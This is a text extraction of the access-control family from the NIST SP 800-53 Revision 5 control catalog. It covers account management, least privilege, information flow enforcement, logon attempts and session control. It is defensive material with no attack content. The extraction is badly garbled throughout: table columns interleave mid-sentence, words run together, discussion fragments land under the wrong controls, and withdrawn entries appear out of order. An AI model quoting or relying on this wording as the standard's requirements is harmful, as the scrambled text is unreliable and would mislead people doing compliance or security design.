NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

Control Control (or Control Enhancement) Name Control Text Discussion Related Controls
Identifier
AC-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Access control policy and procedures address the controls in the AC family that are implemented withi IA-1, PM-9, PM-24, PS-8, SI-12 .
AC-2 Account Management 1. Define
a. [Selection
and(one or more):
document theOrganization-level; Mission/business
types of accounts allowed process-level;
and specifically System-level]
prohibited access
for use within the Examples of system account types include individual, shared, group, system, guest, anonymous, AC-3, AC-5, AC-6, AC-17, AC-18, AC-20, AC-24, AU-2, AU-12, CM-5, IA-2, IA-4, IA-5, IA-8,
AC-2(1) Account Management | Automated System Account Management system;
Support the management of system accounts using [Assignment: organization-defined automated emergency, developer,
Automated system temporary,
account and service.
management Identification
includes of authorized
using automated system
mechanisms tousers and
create, the
enable, MA-3, MA-5, PE-2, PL-4, PS-2, PS-4, PS-5, PS-7, PT-2, PT-3, SC-7, SC-12, SC-13, SC-37.
None.
AC-2(2) Account Management | Automated Temporary and Emergency Account Management mechanisms]. [Selection: remove; disable] temporary and emergency accounts after [Assignment: Management
Automatically modify, disable,of and removeand
temporary accounts; notifyaccounts
emergency accountincludes
managers thewhen an account
removal is created,
or disabling of such None.
AC-2(3) Account Management | Disable Accounts organization-defined time period for each type of account].
Disable accounts within [Assignment: organization-defined time period] when the accounts: accounts automatically after a predefined time period rather than at the convenience
Disabling expired, inactive, or otherwise anomalous accounts supports the concepts of least of the system None.
AC-2(4) Account Management | Automated Audit Actions (a) Have expired;
Automatically audit account creation, modification, enabling, disabling, and removal actions. privilege and least functionality
Account management which
audit records reduce
are definedtheinattack surfacewith
accordance of the system.
AU-2 and reviewed, analyzed, andAU-2, AU-6.
AC-2(5) Account Management | Inactivity Logout Require that users log out when [Assignment: organization-defined time period of expected inactivityInactivity logout is behavior- or policy-based and requires users to take physical action to log out w AC-11.
AC-2(6) Account Management | Dynamic Privilege Management Implement [Assignment: organization-defined dynamic privilege management capabilities]. In contrast to access control approaches that employ static accounts and predefined user privileges, AC-16.
AC-2(7) Account Management | Privileged User Accounts (a) Establish and administer privileged user accounts in accordance with [Selection: a role-based Privileged roles are organization-defined roles assigned to individuals that allow those individuals to None.
AC-2(8) Account Management | Dynamic Account Management access scheme;
Create, activate,an attribute-based
manage, access[Assignment:
and deactivate scheme]; organization-defined system accounts] dynamiperform
Approachescertain security-relevant
for dynamically functions
creating, that ordinary
activating, managing, users
andare not authorized
deactivating systemtoaccounts
perform.rely on AC-16.
AC-2(9) Account Management | Restrictions on Use of Shared and Group Accounts Only permit the use of shared and group accounts that meet [Assignment: organization-defined Before permitting the use of shared or group accounts, organizations consider the increased risk None.
AC-13 Supervision and Review — Access Control conditions forIncorporated
[Withdrawn: establishing shared and
into AC-2 group
and accounts].
AU-6.] due to the lack of accountability with such accounts.
AC-2(11) Account Management | Usage Conditions Enforce [Assignment: organization-defined circumstances and/or usage conditions] for Specifying and enforcing usage conditions helps to enforce the principle of least privilege, increase None.
AC-2(12) Account Management | Account Monitoring for Atypical Usage [Assignment: organization-defined
(a) Monitor system system accounts].
accounts for [Assignment: organization-defined atypical usage]; and user accountability,
Atypical andaccessing
usage includes enable effective
systemsaccount monitoring.
at certain Account
times of the day ormonitoring includes
from locations that alerts
are not AU-6, AU-7, CA-7, IR-8, SI-4.
AC-2(13) Account Management | Disable Accounts for High-risk Individuals (b) Report
Disable atypicalofusage
accounts of system
individuals accounts
within to [Assignment:
[Assignment: organization-defined
organization-defined personnel
time period] or of Users who pose a significant security and/or privacy risk include individuals for whom reliable evide
of discovery AU-6, SI-4.
AC-3 Access Enforcement Enforce approved authorizations for logical access to information and system resources in accordanceAccess control policies control access between active entities or subjects (i.e., users or processes a AC-2, AC-4, AC-5, AC-6, AC-16, AC-17, AC-18, AC-19, AC-20, AC-21, AC-22, AC-24, AC-25,
AC-14(1) Permitted Actions Without Identification or Authentication | Necessary Uses [Withdrawn: Incorporated into AC-14.] AT-2, AT-3, AU-9, CA-9, CM-5, CM-11, IA-2, IA-5, IA-6, IA-7, IA-11, MA-3, MA-4, MA-5,

AC-3(2) Access Enforcement | Dual Authorization Enforce dual authorization for [Assignment: organization-defined privileged commands and/or other Dual authorization, also known as two-person control, reduces risk related to insider threats. Dual CP-9, MP-6.
AC-3(3) Access Enforcement | Mandatory Access Control Enforce [Assignment: organization-defined mandatory access control policy] over the set of covered Mandatory access control is a type of nondiscretionary access control. Mandatory access control SC-7.
AC-3(4) Access Enforcement | Discretionary Access Control subjects[Assignment:
Enforce and objects specified in the policy, discretionary
organization-defined and where the policy:
access control policy] over the set of policiesdiscretionary
When constrain what actions
access subjects
control canare
policies take with information
implemented, obtained
subjects from
are not objects for
constrained which None.
with
covered subjects and objects specified in the policy, and where the policy specifies that a subject they have
regard already
to what beenthey
actions granted access.
can take withThis prevents the
information for subjects from
which they passing
have thebeen
already information
grantedto
AC-3(5) Access Enforcement | Security-relevant Information Prevent
that has access to [Assignment:
been granted access toorganization-defined
information can do one security-relevant
or more of theinformation] unauthorized
following: except during se access. subjects
Security-relevant and have
information
Thus, subjects that objects. Mandatory
is information
been access
grantedwithin control
systems
access to policies
that constrain
can are
information potentially actions thatoperation
impact from
not prevented the passing CM-6, SC-39.
AC-15 Automated Marking [Withdrawn: Incorporated into MP-3.] the information to other subjects or objects (i.e., subjects have the discretion to pass). Discretionary
AC-3(7) Access Enforcement | Role-based Access Control Enforce a role-based access control policy over defined subjects and objects and control access Role-based access control (RBAC) is an access control policy that enforces access to objects and None.
AC-3(8) Access Enforcement | Revocation of Access Authorizations based upon
Enforce [Assignment:
the revocation of organization-defined
access authorizationsroles and users
resulting authorized
from changes to assume
to the securitysuch roles]. of Revocation
attributes system functions of access based on may
rules the defined
differ based role (i.e.,
on the jobtypes
function)of access of the subject.For
revoked. Organizations
example, if can a None.
subjects and objects based on [Assignment: organization-defined rules governing the timing of create specific
subject (i.e., userroles
or based onacting
process job functions
on behalf andof the
a user)authorizations
is removed (i.e., privileges)
from a group, to perform
access may not be
AC-3(9) Access Enforcement | Controlled Release Release information outside of the system only if: Organizations
needed operations can onlyon the directly
systems protect information
associated with when it resides within theroles. system. Additional CA-3, PT-7, PT-8, SA-9, SC-16.
revocations
(a) The receivingof access authorizations].
[Assignment: revoked until theneeded
next time the object isorganizational
opened or the organization-defined
theinformation
next time the subject attempts When to users
access arethe
AC-3(10) Access Enforcement | Audited Override of Access Control Mechanisms Employ an audited override of organization-defined
automated access control system or system component]
mechanisms under [Assignment:providesorganization controls
In certain may be
situations,
object. Revocation such toasensure
when that
there is a threat to human life orisan
adequately
event that protected
threatens once
the it
org is AU-2, AU-6, AU-10, AU-12, AU-14.
[Assignment: organization-defined controls]; and transmitted outsidebased of theon changes
system. to securitywhere
In situations labels the maysystem take effectis unableimmediately.
to determine Organizations
the
AC-3(11) Access Enforcement | Restrict Access to Specific Information Types Restrict access to data repositories containing [Assignment: organization-defined information types].Restricting adequacy ofaccess to specific information
the protections provided by external is intended to provide
entities, flexibility regarding
as a mitigation measure, access control CM-8, CM-12, CM-13, PM-5.
organizations
AC-3(12) Access Enforcement | Assert and Enforce Application Access (a) Require applications to assert, as part of the installation process, the access needed to the Asserting and enforcing application access is intended to address applications that need to access ex CM-7.
AC-3(13) Access Enforcement | Attribute-based Access Control followingattribute-based
Enforce system applications accessand functions:
control policy[Assignment:
over defined organization-defined
subjects and objects and system applications
control access Attribute-based access control is an access control policy that restricts system access to authorized None.
and functions];
based
AC-3(14) Access Enforcement | Individual Access Provideupon [Assignment:
[Assignment: organization-defined
organization-defined attributesto
mechanisms] toenable
assumeindividuals
access permissions].
to have access to the fousers
Individualbased on specified
access organizational
affords individuals the attributes
ability to review (e.g., job function,identifiable
personally identity), action attributes
information about IA-8, PM-22, PM-20, PM-21, PT-6.
(e.g., read, write, delete), environmental attributes (e.g., time of day, location), and resource
AC-3(15) Access Enforcement | Discretionary and Mandatory Access Control (a) Enforce [Assignment: organization-defined mandatory access control policy] over the set of Simultaneously
attributes (e.g., implementing
classification ofa amandatory document). access control policy
Organizations and a discretionary
can create rules based onaccess attributescontrol poSC-2, SC-3, AC-4.
AC-4 Information Flow Enforcement covered subjects and
Enforce approved objects specified
authorizations in the policy;
for controlling and of information within the system and betweInformation flow control regulates where information can travel within a system and between
the flow AC-3, AC-6, AC-16, AC-17, AC-19, AC-21, AU-10, CA-3, CA-9, CM-7, PL-9, PM-24, SA-17,
AC-4(1) Information Flow Enforcement | Object Security and Privacy Attributes Use [Assignment: organization-defined security and privacy attributes] associated with systems
Information (in contrast to who is allowed
flow enforcement mechanisms to access compare the information)
security andand privacywithout regardassociated
attributes to subsequent with SC-4,
None.SC-7, SC-16, SC-31.
[Assignment: accesses to that
(i.e.,information.contentFlow and control restrictions include blocking external traffic that claims to
AC-4(2) Information Flow Enforcement | Processing Domains Use protectedorganization-defined
processing domains information, source, andorganization-defined
to enforce [Assignment: destination objects] to enforce flow contro
information information
Protected
be from processing
within the
datadomains
organization, within structure)
keeping systems and
are source
processing
export-controlled
and spaces
destination
information thatfromobjects
have and respond
controlled
being transmittedinteraction
in SC-39.
[Assignment: organization-defined information flow control policies] as a basis for flow control appropriately when the enforcement mechanisms encounter information flows not explicitly
AC-4(3) Information Flow Enforcement | Dynamic Information Flow Control Enforce [Assignment: organization-defined information flow control policies].
decisions. Organizational
allowed policies regarding
by information flow policies. dynamic information
For example, flow controlobject
an information include allowing
labeled or disallowing
Secret would be i SI-4.
AC-4(4) Information Flow Enforcement | Flow Control of Encrypted Information Prevent encrypted information from bypassing [Assignment: organization-defined information flow co Flow control mechanisms include content checking, security policy filters, and data type identifiers. SI-4.
AC-4(5) Information Flow Enforcement | Embedded Data Types Enforce [Assignment: organization-defined limitations] on embedding data types within other data Embedding data types within other data types may result in reduced flow control effectiveness. None.
AC-4(6) Information Flow Enforcement | Metadata types.
Enforce information flow control based on [Assignment: organization-defined metadata]. Data
Metadata type embedding
is information includes insertingthe
that describes filescharacteristics
as objects within of data.otherMetadata
files and can using compressed
include or AC-16, SI-7.
structural
archived data types that may include multiple embedded data types. Limitations on data type
AC-4(7) Information Flow Enforcement | One-way Flow Mechanisms Enforce one-way information flows through hardware-based flow control mechanisms. One-way flow
embedding mechanisms
consider the levels mayofalso be referred
embedding andtoprohibit
as a unidirectional
levels of data network, unidirectional
type embedding that are None.
AC-4(8) Information Flow Enforcement | Security and Privacy Policy Filters (a) Enforce information flow control using [Assignment: organization-defined security or privacy security gateway, or data
Organization-defined diode.
security or One-way
privacy policy flow filters
mechanisms can address can bedata used to prevent
structures and data from being
content. For None.
policy filters] as aofbasis forreviews
flow control decisions fororganization-defined
[Assignment: organization-defined information exported from a higher impact or classified fordomain or systemcan while permitting data from a lower
AC-4(9) Information Flow Enforcement | Human Reviews Enforce the use human for [Assignment: information flows] under example,
Organizations
impact
securitydefine
or unclassified
or privacy
security
domain
policy
or filterspolicy
orprivacy
system
data
filters
to bestructured
structures
imported. for all situations check for maximum
where automated fileflowlengths,
control None.
flows]; and
the following conditions: maximum field sizes, and data/file types (for and unstructured data). Security or privacy
AC-4(10) Information Flow Enforcement | Enable and Disable Security or Privacy Policy Filters Provide the capability for [Assignment: organization-defined
privileged administrators to enableconditions].
and disable [Assignment: decisions
For
policyexample, are as
filters
possible.
for allowed
data
When
contentby the a fully
can system
check
automated
authorization,
for specific
flow control decision can
administrators
words, enumerated
is not possible,
enable
values or
thenor
security
data value
a privacy
human
ranges, None.
organization-defined reviewfilters
may be to employed in lieu of or as adata complement to automated security or privacy policy
AC-4(11) Information Flow Enforcement | Configuration of Security or Privacy Policy Filters Provide the capabilitysecurity or privacy
for privileged policy filters]
administrators to under
configurethe [Assignment:
following conditions: [Assignment: policy
organization-defined Documentation
filtering.
accommodate
contains detailedapproved
information types. Administrators
forasconfiguring security also orhave the
privacy capability
policy filters.to For
select None.
organization-defined
security or privacy policy conditions].
filters]between
to support different security or privacy the filtersHuman
that are reviews
executed may
can on
also be employed
a specific data flow deemed
based on necessary
thefilters
type of by organizations.
todata thatthe is being
AC-4(12) Information Flow Enforcement | Data Type Identifiers When transferring information different security domains, usepolicies.
[Assignment: organization- Data example, type
transferred, the
administrators
identifierssource include
and
configure
filenames,
destination
security
file types,
security
or file
privacy
domains,
policy
signatures
and other or tokens,
security
include
and multiple
or privacy
list internal
of
relevant file None.
defined data type identifiers] inappropriate words that security orallow
privacy policy ofmechanisms check in accordance with the
AC-4(13) Information Flow Enforcement | Decomposition into Policy-relevant Subcomponents When transferring informationtobetween validate different
data essential
securityfor domains,
information flow decisions.
decompose information into signatures
Decomposing
definitions
or tokens.
information
provided
Systems intoonly
by organizations. policy-relevant transfer data that isprior
subcomponents compliant with datatransfer
to information type format None.
[Assignment: organization-defined policy-relevant subcomponents] for submission to policy specifications.
facilitates policy Identification
decisions on and validation
source, of datacertificates,
destination, types is based on definedattachments,
classification, specificationsand other
AC-4(14) Information Flow Enforcement | Security or Privacy Policy Filter Constraints When transferring information between different security domains, implement [Assignment: Data structure
associated with and
each content
allowed restrictions
data format. reduceThe the rangeand
filename of potential
number malicious
alone or unsanctioned
are not used applyfor data None.
enforcement
organization-defined mechanisms.security orbetween
privacy policy filters] requiring fully examine
enumerated formats thatfor the security-
content inorcross-domain
privacy-related component
transactions. differentiators.
Security or privacy Policy
policy enforcement
filters mechanisms
AC-4(15) Information Flow Enforcement | Detection of Unsanctioned Information When transferring information different security domains, the information Up nsanctioned
filtering, information
inspection, and/or includes
sanitization malicious
rules code,
to the information
policy-relevant isthat
thatsubcomponentsrestrict
inappropriate data
offor structures
release fromSI-3.
information
restrict data structure and content. include restricting file sizes and field lengths. Data content policy filters include encoding formats
AC-17(5) Remote Access | Monitoring for Unauthorized Connections [Withdrawn: Incorporated into SI-4.] for character sets, restricting character data fields to only contain alpha-numeric characters,
AC-4(17) Information Flow Enforcement | Domain Authentication Uniquely identify and authenticate source and destination points by [Selection (one or more): organiza Attribution is a critical component of a security and privacy concept of operations. The ability to ide IA-2, IA-3, IA-9.
AC-17(7) Remote Access | Additional Protection for Security Function Access [Withdrawn: Incorporated into AC-3(10).]
AC-4(19) Information Flow Enforcement | Validation of Metadata When transferring information between different security domains, implement [Assignment: All information (including metadata and the data to which the metadata applies) is subject to None.
AC-4(20) Information Flow Enforcement | Approved Solutions organization-defined
Employ [Assignment: security or privacy policy
organization-defined filters]inon
solutions metadata.
approved filtering and inspection.
configurations] to control the flow Organizations define approved Some organizations
solutions anddistinguishconfigurations between metadata and
in cross-domain data and
policies payloads (i.e., None.
guidance
of [Assignment: organization-defined only the data to which
the the metadata is bound). Other organizations doboundaries.
not make such distinctions
AC-4(21) Information Flow Enforcement | Physical or Logical Separation of Information Flows Separate information flows logically orinformation] across
physically using security domains.
[Assignment: organization-defined mechanis in and
accordance
Enforcing
consider
with
themetadata
separation types
and
of information
of information
the data to flowsflows
which
across
associated
the metadata
classification
with defined
applies to types
be partofof
datathe
The
can National
enhance protSC-32.
payload.
Security Agency (NSA) National Cross Domain Strategy and Management Office provides a listing of
AC-4(22) Information Flow Enforcement | Access Only Provide access from a single device to computing platforms, applications, or data residing in The systemcross-domain
approved provides a capability solutions.for users to
Contact access each connected
[email protected] for more security domain without
information. None.
AC-4(23) Information Flow Enforcement | Modify Non-releasable Information multiple
When different security
transferring information domains,
between whiledifferent
preventing information
security domains, flow between
modify the different
non-releasable providing any
Modifying mechanismsinformation
non-releasable to allow users cantohelp transfer
prevent data or information
a data spill or attack between
when the different is
information None.
security domains.
information by implementing [Assignment: organization-defined modification action]. security domains.
transferred across An example
security of an access-only
domains. Modification solution
actions isinclude
a terminal masking,that provides
permutation, a useralteration,
access to
AC-4(24) Information Flow Enforcement | Internal Normalized Format When transferring information between different security domains, parse incoming data into an Converting data
information withinto normalized
different security forms is one of most
classifications whileofassuredly
effective keepingmechanisms to stop malicious
the information separate. None.
internal normalizedinformation
format and between
regenerate the data to be consistent with itsdata
intended specification. removal, or large
redaction.
AC-4(25) Information Flow Enforcement | Data Sanitization When transferring different security domains, sanitize to minimize [Select attacks and
Data sanitization classes
is of dataofexfiltration.
the process irreversibly removing or destroying data stored on a memory deviceMP-6.
AC-4(26) Information Flow Enforcement | Audit Filtering Actions When transferring information between different security domains, record and audit content filteringContent filtering is the process of inspecting information as it traverses a cross-domain solution and AU-2, AU-3, AU-12.
AC-4(27) Information Flow Enforcement | Redundant/independent Filtering Mechanisms When transferring information between different security domains, implement content filtering Content filtering is the process of inspecting information as it traverses a cross-domain solution and None.
AC-4(28) Information Flow Enforcement | Linear Filter Pipelines solutions
When that provide
transferring redundant
information and independent
between filteringdomains,
different security mechanisms for eacha linear
implement data type.
content determines
Content if theisinformation
filtering the processmeets a predefined
of inspecting informationpolicy. as Redundant
it traverses and independent content
a cross-domain solution and None.
filter filtering eliminates a single point of failure filteringpolicy.
system. Independence is definedfilteras the
AC-4(29) Information Flow Enforcement | Filter Orchestration Engines Whenpipeline
transferringthat isinformation
enforced with betweendiscretionary
differentand mandatory
security domains, access controls.
employ content filter determines
Content filtering
implementation
if theisinformation
the
ofprocessesprocess
a content
meets a predefined
of inspecting
filter that uses ainformation
different
The
as
code
use of linear
itbase
traverses content
a cross-domain
andInsupporting libraries
pipelines
solution and
two None.
orchestration engines to ensurebetween
that: different security domains, implement content filtering ensures
determines thatiffilter
the information are
meetsnon-bypassable
a predefined and always
security invoked.
policy. general, the
An orchestration use of(e.g.,
engine parallel
AC-4(30) Information Flow Enforcement | Filter Mechanisms Using Multiple Processes When transferring information The use of multiple
filtering architectures processes
for content to implement
filtering content
of a single filtering
data mechanisms
type introduces reduces
bypass the
and non- likelihood of None.
mechanisms using multiple processes. coordinates
aContent
single point the sequencing
of failure. of activities (manual and automated) in a content filtering process.
AC-4(31) Information Flow Enforcement | Failed Content Transfer Prevention When transferring information between different security domains, prevent the transfer of failed Errors arethat failed
defined filtering
as either checks
anomalous can corrupt
actions the system if transferred
or unexpected termination to of
thethereceiving
contentdomain. filter None.
AC-4(32) Information Flow Enforcement | Process Requirements for Information Transfer content to the receiving domain.
When transferring information between different security domains, the process that transfers The processes transferring information between filter pipelines have minimum complexity and None.
AC-5 Separation of Duties information
a. Identify and between
document filter[Assignment:
pipelines: organization-defined duties of individuals requiring functionality
Separation oftoduties provide assurance
addresses thethat the processes
potential for abuseoperate of authorized correctly. privileges and helps to reduce t AC-2, AC-3, AC-6, AU-9, CM-5, CM-11, CP-9, IA-2, IA-4, IA-5, IA-12, MA-3, MA-5, PS-2, SA-
AC-6 Least Privilege separation]; and
Employ the principle of least privilege, allowing only authorized accesses for users (or processes acti Organizations employ least privilege for specific duties and systems. The principle of least privilege 8, SA-17.
AC-2, AC-3, AC-5, AC-16, CM-5, CM-11, PL-2, PM-12, SA-8, SA-15, SA-17, SC-38.
AC-6(1) Least Privilege | Authorize Access to Security Functions Authorize access for [Assignment: organization-defined individuals or roles] to: Security functions include establishing system accounts, configuring access authorizations (i.e., perm AC-17, AC-18, AC-19, AU-9, PE-2.
AC-6(2) Least Privilege | Non-privileged Access for Nonsecurity Functions (a) [Assignment:
Require that users organization-defined
of system accounts security (or roles)functions
with access (deployed in hardware,
to [Assignment: software, and
organization-defined secRequiring the use of non-privileged accounts when accessing nonsecurity functions limits exposure wh AC-17, AC-18, AC-19, PL-4.
firmware)]; and
AC-6(3) Least Privilege | Network Access to Privileged Commands Authorize network access to [Assignment: organization-defined privileged commands] only for [AssignNetwork access is any access across a network connection in lieu of local access (i.e., user being physiAC-17, AC-18, AC-19.
AC-6(4) Least Privilege | Separate Processing Domains Provide separate processing domains to enable finer-grained allocation of user privileges. Providing separate processing domains for finer-grained allocation of user privileges includes using AC-4, SC-2, SC-3, SC-30, SC-32, SC-39.
AC-6(5) Least Privilege | Privileged Accounts Restrict privileged accounts on the system to [Assignment: organization-defined personnel or roles]. Privileged accounts, including super user accounts, are typically described as system administrator foIA-2, MA-3, MA-4.
AC-6(6) Least Privilege | Privileged Access by Non-organizational Users Prohibit privileged access to the system by non-organizational users. An organizational user is an employee or an individual considered by the organization to have the equi AC-18, AC-19, IA-2, IA-8.
AC-6(7) Least Privilege | Review of User Privileges (a) Review [Assignment: organization-defined frequency] the privileges assigned to [Assignment: The need for certain assigned user privileges may change over time to reflect changes in organizationaCA-7.
AC-6(8) Least Privilege | Privilege Levels for Code Execution organization-defined
Prevent the followingroles or classes
software of users] to
from executing atvalidate the needlevels
higher privilege for such
thanprivileges; and the
users executing In certain situations, software applications or programs need to execute with elevated privileges to None.
AC-6(9) Least Privilege | Log Use of Privileged Functions software: [Assignment:
Log the execution organization-defined
of privileged functions. software]. perform
The misuse required functions.
of privileged However,
functions, eitherdepending
intentionally on the orsoftware
unintentionally functionality and configuration,
by authorized users or byif AU-2, AU-3, AU-12.
the privileges required for execution are at a higher level than the privileges assigned to
AC-6(10) Least Privilege | Prohibit Non-privileged Users from Executing Privileged Functions Prevent non-privileged users from executing privileged functions. Privileged functions
organizational users include
invokingdisabling, circumventing,
such applications or altering
or programs, those implemented security or
users may indirectly beprivacy
provided None.
AC-7 Unsuccessful Logon Attempts controls, establishing system accounts,
a. Enforce a limit of [Assignment: organization-defined number] consecutive invalid logon attempts The need to limit unsuccessful logon attempts and take subsequent action when the maximum number performing system integrity checks, and administering AC-2,
of AC-9, AU-2, AU-6, IA-5.
by a user during a [Assignment: organization-defined time period]; and cryptographic key management activities. Non-privileged users are individuals who do not possess
AC-17(8) Remote Access | Disable Nonsecure Network Protocols [Withdrawn: Incorporated into CM-7.] appropriate authorizations. Privileged functions that require protection from non-privileged users
AC-7(2) Unsuccessful Logon Attempts | Purge or Wipe Mobile Device Purge or wipe information from [Assignment: organization-defined mobile devices] based on [Assign A mobile device is a computing device that has a small form factor such that it can be carried by a s AC-19, MP-5, MP-6.
AC-7(3) Unsuccessful Logon Attempts | Biometric Attempt Limiting Limit the number of unsuccessful biometric logon attempts to [Assignment: organization-defined nu Biometrics are probabilistic in nature. The ability to successfully authenticate can be impacted by many IA-3.factors, including matching performance and presentation attack detection mechanisms. Organization
AC-7(4) Unsuccessful Logon Attempts | Use of Alternate Authentication Factor (a) Allow the use of [Assignment: organization-defined authentication factors] that are different The use of alternate authentication factors supports the objective of availability and allows a user w IA-3.
AC-8 System Use Notification from the primary authentication factors after the number of organization-defined consecutive
a. Display [Assignment: organization-defined system use notification message or banner] to users System use notifications can be implemented using messages or warning banners displayed before indiv AC-14, PL-4, SI-4.
invalid
before logon
granting attempts have
to thebeen
accesssuccessful system exceeded; and privacy and security notices consistent with
AC-9 Previous Logon Notification Notify the user, upon logonthat provides
to the system, of the date and time of the last logon. Previous logon notification is applicable to system access via human user interfaces and access to systAC-7, PL-4.
applicable laws, executive orders, directives, regulations, policies, standards, and guidelines and
AC-9(1) Previous Logon Notification | Unsuccessful Logons Notifythat:
state the user, upon successful logon, of the number of unsuccessful logon attempts since the last Information about the number of unsuccessful logon attempts since the last successful logon allows None.
AC-9(2) Previous Logon Notification | Successful and Unsuccessful Logons successful
Notify logon.upon successful logon, of the number of [Selection: successful logons; unsuccessful Information
the user, the user to recognize
about theifnumber the number of unsuccessful
of successful logon attempts
and unsuccessful logonisattempts
consistent withathe
within user’s
specified None.
logon attempts; both]successful
during [Assignment: organization-defined time period]. actual logonallows
time period attempts. the user to to security-related
recognize if the number
AC-9(3) Previous Logon Notification | Notification of Account Changes Notify the user, upon logon, of changes to [Assignment: organization-defined security- Information about changes account and type of logon
characteristics attempts
within are consistent
a specified time period None.
related characteristics or parameters of the user’s account] during [Assignment: organization- with the
allows user’s
users to actual
recognize logon if attempts.
changes were made without their knowledge.
AC-9(4) Previous Logon Notification | Additional Logon Information Notify the user, upon successful logon, of the following additional information: [Assignment: Organizations can specify additional information to be provided to users upon logon, including the None.
defined time period]. additional information].
organization-defined location of the last logon. User location is defined as information that can be determined by
systems, such as Internet Protocol (IP) addresses from which network logons occurred, notifications
of local logons, or device identifiers.

1 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

AC-10 Concurrent Session Control Limit the number of concurrent sessions for each [Assignment: organization-defined account and/or Organizations may define the maximum number of concurrent sessions for system accounts globally,SC-23. by
AC-11 Device Lock a. Prevent further access to the system by [Selection (one or more): initiating a device lock after Device locks are temporary actions taken to prevent logical access to organizational systems when user AC-2, AC-7, IA-11, PL-4.
AC-11(1) Device Lock | Pattern-hiding Displays [Assignment:
Conceal, via theorganization-defined
device lock, information time period]
previouslyof inactivity;
visible onrequiring
the display thewith
userato initiateviewable
publicly a device The pattern-hiding display can include static or dynamic images, such as patterns used with screen None.
lock before leaving the system unattended]; and
image.
AC-12 Session Termination Automatically terminate a user session after [Assignment: organization-defined conditions or trigger savers, Sessionphotographic
termination addresses images, solid colors, clock,ofbattery
the termination life indicator,
user-initiated logicalor a blank(in
sessions screen
contrastwithto theSC-10 MA-4, SC-10, SC-23.
caveat that controlled unclassified information is not displayed.
AC-12(1) Session Termination | User-initiated Logouts Provide a logout capability for user-initiated communications sessions whenever authentication is Information resources to which users gain access via authentication include local workstations, None.
AC-12(2) Session Termination | Termination Message used to an
Display gain accesslogout
explicit to [Assignment:
message toorganization-defined information of
users indicating the termination resources].
authenticated databases,
Logout and password-protected
messages for web access canwebsites be displayed or web-based services. sessions have been
after authenticated None.
AC-12(3) Session Termination | Timeout Warning Message communications sessions.
Display an explicit message to users indicating that the session will end in [Assignment: terminated. However, for certain types of sessions, including file
To increase usability, notify users of pending session termination and prompt users to continue the None. transfer protocol (FTP) sessions,
organization-defined time until end of session]. systems typically
session. The pendingsendsession
logouttermination
messages astime finalperiod
messages prioron
is based to the
terminating
parameters sessions.
defined in the AC-
AC-18(2) Wireless Access | Monitoring Unauthorized Connections [Withdrawn: Incorporated into SI-4.]
12 base control.
AC-14 Permitted Actions Without Identification or Authentication a. Identify [Assignment: organization-defined user actions] that can be performed on the system Specific user actions may be permitted without identification or authentication if organizations dete AC-8, IA-2, PL-2.
AC-19(1) Access Control for Mobile Devices | Use of Writable and Portable Storage Devices without
[Withdrawn:identification
Incorporated or authentication
into MP-7.] consistent with organizational mission and business
functions; and
AC-19(2) Access Control for Mobile Devices | Use of Personally Owned Portable Storage Devices [Withdrawn: Incorporated into MP-7.]
AC-16 Security and Privacy Attributes a. Provide the means to associate [Assignment: organization-defined types of security and privacy Information is represented internally within systems using abstractions known as data structures. AC-3, AC-4, AC-6, AC-21, AC-25, AU-2, AU-10, MP-3, PE-22, PT-2, PT-3, PT-4, SC-11, SC-16,
AC-16(1) Security and Privacy Attributes | Dynamic Attribute Association attributes] with
Dynamically [Assignment:
associate securityorganization-defined
and privacy attributes security and privacy attribute
with [Assignment: values] for
organization-defined Internal data
Dynamic structures
association can represent
of attributes different types
is appropriate whenever of entities, both active
the security and passive.
or privacy Active of SI-12,
characteristics None. SI-18.
information
subjects andinobjects]
storage, inin process, and/or
accordance with thein transmission;
following security entities, alsochange
known over as subjects, are typically associated with individuals, devices, or processes
AC-16(2) Security and Privacy Attributes | Attribute Value Changes by Authorized Individuals Provide authorized individuals (or processes acting on behalf ofand privacy policies
individuals) as information
the capability to defineis information
The content
acting on behalfor assigned time. Attributes
values of attributes may canchange
directly due to information
affect the ability aggregation
areoftypically
individuals issues
to access(i.e., None.
created
or changeand combined:
the value of [Assignment:
associated organization-defined
security and privacy security and privacy policies].
attributes. characteristics
organizational ofofindividual
individuals.
information. data Passive
Therefore,elements entities,
it is are also
different
important
known
for from asthe
systems
objects,
combined
to be able elements),
to limit
associated
the changes
ability
with
toin
AC-16(3) Security and Privacy Attributes | Maintenance of Attribute Associations by System Maintain the association and integrity of [Assignment: organization-defined security and privacy Maintaining
individual the association
access authorizations and (i.e.,
integrity of security
privileges), changes and privacy attributes
in the security to subjects
category and objectsor None.
of information,
attributes] create or modify attributes to authorized individuals.
AC-16(4) Security and Privacy Attributes | Association of Attributes by Authorized Individuals Provide thetocapability
[Assignment: organization-defined
to associate subjects and objects].security and privacy
[Assignment: organization-defined with sufficient
Systems, assurance
in general, provide helpsthetocapability
ensure that for the attribute
privileged associations
users can be used
to assign security and as the basis of None.
privacy
attributes] with [Assignment: organization-defined subjectsform
andon objects] by authorized automatedtopolicy actions. Thesubjects integrity of specific items, such (e.g.,
as security configuration andfiles, may be
AC-16(5) Security and Privacy Attributes | Attribute Displays on Objects to Be Output Display security and privacy attributes in human-readable each object that the individuals
system attributes
System outputs
maintained
system-defined
throughinclude printed
theadditional
use of an pages, (e.g.,
integrity screens,users)or and
monitoring
objects
equivalent
mechanism items.that directories,
System output
detects
files,devices
anomalies
ports).
include None.
and
(or processes
transmits acting devices
to output on behalf to of individuals).
identify [Assignment: organization-defined special dissemination, Some systems
printers, notebook provide computers, capability
video displays, forsmart
general users to
phones, assign security and privacy
AC-16(6) Security and Privacy Attributes | Maintenance of Attribute Association Require personnel to associate and maintain the association of [Assignment: organization-defined Maintaining
attributes to attribute
additional association
objects requires
(e.g., files, individual
emails). The users (asand
association opposedtablets. to To
themitigate
of attributes system)
by full
the risk of
to maintain
authorized None.
handling,
security aandor distribution instructions]
privacy attributes] using
withof[Assignment:[Assignment: organization-defined human-readable, unauthorized exposure of information (e.g., shoulder surfing), the outputs display attribute
AC-16(7) Security and Privacy Attributes | Consistent Attribute Interpretation Provide
standard consistent
naming interpretation
conventions]. security andorganization-defined subjects and
privacy attributes transmitted objects] in
between associations
To enforce
values
of defined
whensecurity
unmasked andsecurity
privacy
by
and privacy
policies
the subscriber. across attributes
multiplewith systemsubjects
componentsand objects.in distributed systems, None.
accordance
distributed with [Assignment:
